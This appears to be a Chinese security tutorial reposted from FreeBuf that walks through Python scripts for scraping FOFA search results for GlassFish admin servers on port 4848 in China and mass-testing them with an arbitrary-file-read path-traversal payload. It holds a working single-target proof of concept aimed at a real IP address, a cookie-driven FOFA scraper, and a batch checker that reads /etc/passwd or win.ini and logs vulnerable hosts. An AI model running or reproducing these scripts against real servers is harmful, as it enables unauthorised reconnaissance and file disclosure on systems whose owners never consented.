Python开发-批量Fofa&&POC验证 – 作者:掌控安全一Wudu

学习目的：掌握利用公开或0day漏洞进行批量化的收集及验证脚本开发

首先有一个基本的漏洞是应用服务器glassfish任意文件读取漏洞

该漏洞标题写的是任意文件读取漏洞，其实该漏洞同样可以列出对应目录文件，基本上等同于源代码泄露，各种敏感信息暴露无遗。

Linux服务器会读取etc/passwd文件的内容

windows服务器会读取windows/win.ini文件的内容

4848端口为glassfish默认开放的web管理端口

首先去fofa搜索一波

“glassfish”&&port=”4848″ && after=”2021-01-01″ && country=”CN”

目的就是把这些ip地址爬下来然后用poc验证

首先写一个简易的poc验证代码

#encoding:utf-8
import requests

url='http://112.126.97.184:4848/'
payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'

data_linux= requests.get(url+payload_linux)  #获取请求后的返回源代码
data_windows=requests.get(url+payload_windows)

data_linux=requests.get(url+payload_linux).status_code  #获取请求后的返回状态码
data_windows=requests.get(url+payload_windows).status_code

if data_linux==200 or data_windows==200:
    print("存在漏洞")
else:
    print("不存在漏洞")

然后需要考虑的是如何实现批量化

1.获取到可能存在漏洞的地址信息-借助fofa进行获取目标

2将请求的数据进行筛选

当搜索glassfish”&&port=”4848″ && after=”2021-01-01″ && country=”CN时

fofa的第一页地址为

https://fofa.so/result?qbase64=ImdsYXNzZmlzaCImJnBvcnQ9IjQ4NDgiICYmIGFmdGVyPSIyMDIxLTAxLTAx
IiAmJiBjb3VudHJ5PSJDTiI%3D

可以看出?qbase64=后面的数值为一串base64的编码

解码过来就是搜索的值

所以我们要将搜索值进行base64编码

import base64
import requests

url='https://fofa.so/result?qbase64='
search_data='"glassfish"&&port="4848" && after="2021-01-01" && country="CN"'
search_data_bs=str(base64.b64encode(search_data.encode('utf-8')),"utf-8")
urls=url+search_data_bs
result=requests.get(urls).content
print(result.decode('utf-8')) 

可以看出爬下来的为整个页面的代码

接下来就要筛选关键值，查看源代码要提取红框中的值

需要引入库lxml

根据规则提取目标值：//div[@class=”re-domain”]//a[@target=”_blank”]/@href

# -*- coding:UTF-8 -*-

import requests
import base64
from lxml import etree

url='https://fofa.so/result?qbase64='
search_data='"glassfish"&&port="4848" && after="2021-01-01" && country="CN"'
search_data_bs=str(base64.b64encode(search_data.encode('utf-8')),"utf-8")
urls=url+search_data_bs
result=requests.get(urls).content
soup = etree.HTML(result)
ip_data=soup.xpath('//div[@class="re-domain"]//a[@target="_blank"]/@href')
ipdata='\n'.join(ip_data)
print(result.decode(ipdata))

结果可以打印一页的ip地址

接下来要爬取多页的ip然后保存到txt文件下面

因为fofa登陆后才能读取第二页的信息，所以要提取出cookie

完善一下代码后

#encoding:utf-8
import requests
import base64
import time
import sys
from lxml import etree

def fofa_search(search_data,page):
    #search_data='"glassfish"&&port="4848" && after="2021-01-01" && country="CN"'
    headers={
        'cookie':'',
    }
    for yeshu in range(1,page+1):
        url='https://fofa.so/result?page='+str(yeshu)+'&qbase64='
        search_data_bs=str(base64.b64encode(search_data.encode('utf-8')),"utf-8")
        urls=url+search_data_bs
        print('正在提取第'+str(yeshu)+'页')
        try:
            result=requests.get(urls,headers=headers).content
            #print(result.decode('utf-8'))
            soup = etree.HTML(result)
            ip_data=soup.xpath('//div[@class="re-domain"]//a[@target="_blank"]/@href')
            ipdata='\n'.join(ip_data)
            with open(r'ip.txt','a+')as f:
                f.write(ipdata+'\n')
                f.close()
            time.sleep(0.5)
        except Exception as e:
            pass
        print(ip_data)
        
if __name__ == '__main__':
    search=sys.argv[1]
    page=sys.argv[2]
    fofa_search(search,int(page))
 

再完善之前poc的代码读取ip.txt的地址  把有漏洞的ip存入ck_vunl.txt的文件中

import requests
import time
import base64

payload_linux = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows = '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'

for ip in open('ip.txt'):
    ip=ip.replace('\n','')
    windows_url=ip+payload_windows
    linux_url=ip+payload_linux
    #data_linux= requests.get(url+payload_linux)  #获取请求后的返回源代码
    #data_windows=requests.get(url+payload_windows)
    try:

        vuln_linux=requests.get(linux_url).status_code  #获取请求后的返回状态码
        vuln_windows=requests.get(windows_url).status_code
        print("check->"+ip)
        if vuln_linux==200 or vuln_windows==200:
            with open(r'ck_vuln.txt', 'a+') as f:
                f.write(ip + '\n')
                f.close()
    except Exception as e:
        pass

有没有人拼一下fofa会员啊

来源：freebuf.com 2021-03-02 16:14:30 by: 掌控安全一Wudu